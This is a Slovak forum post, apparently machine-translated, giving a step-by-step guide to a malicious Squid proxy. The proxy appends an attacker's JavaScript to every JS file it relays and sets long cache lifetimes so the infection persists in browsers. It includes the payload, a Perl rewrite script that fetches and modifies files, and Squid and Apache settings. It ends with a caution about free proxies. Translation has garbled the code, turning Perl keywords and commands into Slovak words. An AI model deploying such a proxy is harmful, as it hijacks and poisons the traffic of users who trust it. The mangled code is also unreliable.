Tento príspevok naposledy upravil Mo Xiaowen 7. júna 2015 o 23:19
To sa dá dosiahnuť jednoduchou úpravou konfigurácie SQUID
Čo je SQUID?
Squid je softvér, ktorý uchováva internetové dáta do vyrovnávacej pamäte, prijíma požiadavky na stiahnutie od používateľov a automaticky spracováva stiahnuté dáta. Keď si používateľ chce stiahnuť domovskú stránku, môže poslať požiadavku Squidovi, požiadať ho, aby si ju stiahol v jeho mene, potom sa Squid pripojí na webovú stránku a požiada o domovskú stránku, a následne pošle domovskú stránku používateľovi a ponechá zálohu, keď sa iní používatelia prihlásia na tú istú stránku, Squid okamžite pošle uloženú zálohu používateľovi, takže používateľ má pocit, že rýchlosť je pomerne vysoká. Squid dokáže proxy protokoly ako HTTP, FTP, GOPHER, SSL a WAIS, a Squid to zvládne automaticky, a vy si môžete nastaviť Squid podľa svojich potrieb na filtrovanie nežiaducich vecí.
Squid môže fungovať v mnohých operačných systémoch, ako sú AIX, Digital, UNIX, FreeBSD, HP-UX, Irix, Linux, NetBSD, Nextstep, SCO, Solaris, OS/2 a ďalšie.
Implementácia je veľmi jednoduchá:
1. Nainštalovať Squid na jeden Linux server.
2. Upraviť kód servera, vložiť časť nášho kódu do všetkých prenesených javascrip a odoslať ich.
3. Nastavte čas cache nášho upraveného js súboru čo najvyšší.
Táto metóda platí aj pre webové stránky s povoleným SSL – ak stránka načíta nezabezpečený zdroj (napríklad jquery pre HTTP stránku), väčšina prehliadačov dá varovanie, ale málokto tomu venuje pozornosť.
Chema uviedol, že viac ako 5 000 ľudí použilo jeho proxy pár dní po jeho zverejnení a väčšina ľudí ho použila na zlé veci, pretože použili proxy, takže si mysleli, že je anonymný a bezpečný, ale nikdy nečakali, že proxy server urobí zlé veci tiež.
Vytvorte si svoj škodlivý proxy server
Ak už máte Squid proxy server, budete potrebovať aj webový server, napríklad Apache.
Krok 1: Vytvorenie užitočného zaťaženia
Používam jednoduchý skript ako ukážku na nasmerovanie všetkých hypertextových odkazov na moju webovú stránku.
/etc/squid/payload.js
[mw_shl_code=javascrip remove t, true]for(var i=0; i<document.getelementsbytagname('a').length; i++)
document.getElementsByTagName('a').href = "https://blog.haschek.at"; [/mw_shl_code]
Krok 2: Napíšte skript na infikovanie všetkých JS súborov
/etc/squid/poison.pl
[mw_shl_code=perl, pravda]
#!/usr/bin/perl
$|=1;
$count = 0;
$pid = $$;
while(<>)
{
chrumkanie $_;
if($_ =- /(.*.js)/i)
{
$url = $;
system ("/usr/bin/wget","-q","-O","/var/www/tmp/$pid-$count.js","$url");
system("chmod o+r /var/www/tmp/$pid-$count.js");
systém ("mačka /etc/squid/payload.js >> /var/www/tmp/$pid-$count.js");
tlač "http://127.0.0.1:80/tmp/$pid-$count.js";
}
else
{
tlač "$_";
}
$count++;
}[/mw_shl_code]
Tento skript používa wget na získanie pôvodného javascripu stránky a odstránenie t súboru, potom pridá kód do /etc/squid/payload.js a pošle upravený súbor klientovi, zatiaľ čo ty musíš vytvoriť adresár /var/www/tmp a povoliť squid zapisovať do neho súbory. Tento adresár uchováva upravené js súbory.
Krok 3: Skombinujte vyššie uvedený skript so Squid
Pridajte to do /etc/squid/squid.conf
[mw_shl_code=html,true]url_rewrite_program /etc/squid/poison.pl[/mw_shl_code]
Krok 4: Nech cache nikdy nezlyhá
/var/www/tmp/.htaccess
[mw_shl_code=html,true] ExpiresActive On
ExpiresDefault "prístup plus 3000 dní"[/mw_shl_code]
Tým Apache povie, aby mu dal dlhú dobu expirácie, kým používateľ nevyčistí svoju cache.
Ak pripojíte tento proxy, kliknutím na akýkoľvek hypertextový odkaz vás presmeruje na moju webovú stránku a cache bude existovať aj v prípade, že proxy neskôr nepoužijete. Použil som neagresívny payload a s touto metódou môžu hackeri urobiť oveľa viac. Takže si a priateľom pripomínajte, aby ste boli opatrní pri používaní bezplatných proxy.
|
Zverejnené 19. 1. 2015 2:34:56
|
|
|
|
Zverejnené 19. 1. 2015 8:48:45
|
Prenajímateľ|
Zverejnené 20. 1. 2015 14:36:06
|
